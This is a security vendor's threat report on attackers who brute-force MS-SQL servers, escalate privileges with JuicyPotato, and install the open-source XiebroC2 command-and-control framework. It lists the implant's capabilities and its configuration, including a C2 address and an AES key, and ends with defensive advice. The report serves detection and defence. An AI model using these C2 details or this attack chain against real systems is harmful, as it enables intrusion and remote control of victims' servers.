XiebroC2 Identified in MS-SQL Server Attack Cases
AhnLab SEcurity intelligence Center (ASEC) monitors attacks targeting poorly managed MS-SQL servers and recently confirmed a case involving the use of XiebroC2. XiebroC2 is a C2 framework with open-source code that supports various features such as information collection, remote control, and defense evasion, similar to CobaltStrike. [1]
Figure 1. XiebroC2’s GitHub page
1. Attack Case
The attacked system is exposed to the outside and is suspected to be using vulnerable credentials. The system has already been identified for multiple malware installation attempts. CoinMiner was used, like in other cases of attacks against MS-SQL servers.
After successfully logging in, the threat actor installed JuicyPotato. Note that, in the case of MS-SQL services, even if the processes responsible for the name are vulnerable to the threat actor’s commands due to vulnerabilities or inappropriate configurations, the processes are executed with low privileges by default. This means that the malware that is executed with the privileges of the process also has limitations in performing additional malicious behaviors. For this reason, threat actors often use Potato malware, which involves privilege escalation by exploiting certain permissions among the tokens of the account of the currently running process.
After installing JuicyPotato, XiebroC2 was downloaded using PowerShell.
Figure 2. MS-SQL service downloading XiebroC2
2. XiebroC2
XiebroC2 is a C2 framework similar to CobaltStrike, and its source code is publicly available. The Implant, which is responsible for the backdoor features, is written in Go and supports multiple platforms, including Windows, Linux, and macOS. Threat actors can use XiebroC2 installed on infected systems to utilize features such as remote control, reverse shell, file and process management, network monitoring, reverse proxy, and taking screenshots.
Figure 3. XiebroC2 panel (GitHub)
XiebroC2 contains the following configuration information. After execution, it can collect information such as PID, HWID, computer name, and username, and then connect to the C&C server to execute commands from the threat actor.
- HostPort = “1.94.185[.]235:8433
- Protocol = “Session/Reverse_Ws
- ListenerName = “test2
- AesKey = “QWERt_CSDMAHUATW
Figure 4. Information collected by XiebroC2
3. Conclusion
The two main types of attacks against MS-SQL servers are brute force and dictionary attacks, usually targeting systems with poorly managed account credentials. Administrators are advised to use complex, difficult-to-guess passwords and change them regularly to protect their database servers from brute force and dictionary attacks.
V3 should also be kept up-to-date to prevent malware infection. Furthermore, security measures such as firewalls should be employed to restrict access by external threat actors to database servers that are publicly accessible. Failure to implement these measures may result in continuous infection by threat actors and malware.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
